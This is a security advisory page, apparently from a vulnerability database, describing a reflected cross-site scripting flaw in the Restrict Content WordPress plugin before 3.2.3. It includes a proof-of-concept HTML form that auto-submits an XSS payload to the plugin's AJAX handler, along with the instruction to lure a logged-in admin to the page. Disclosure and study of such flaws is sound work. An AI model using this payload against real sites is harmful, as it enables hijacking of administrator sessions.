Lucene search

K
wpexploitWpvulndbWPEX-ID:655A68EE-9447-41CA-899E-986A419FB7ED
HistoryJun 26, 2023 - 12:00 a.m.

Membership Plugin - Restrict Content < 3.2.3 - Reflected XSS

2023-06-2600:00:00
wpvulndb
61
membership plugin
reflected xss
html injection
admin privilege

0.001 Low

EPSS

Percentile

21.1%

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged-in admin open a page containing the HTML code below.

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
        <input type="text" name="action" value="rcp_ajax_dismissed_notice_handler"/>
        <input type="text" name="a" value="<svg/onload=alert(/XSS/)>"/>
        <input type="submit" value="submit"/>
    </form>
</body>

0.001 Low

EPSS

Percentile

21.1%

Related for WPEX-ID:655A68EE-9447-41CA-899E-986A419FB7ED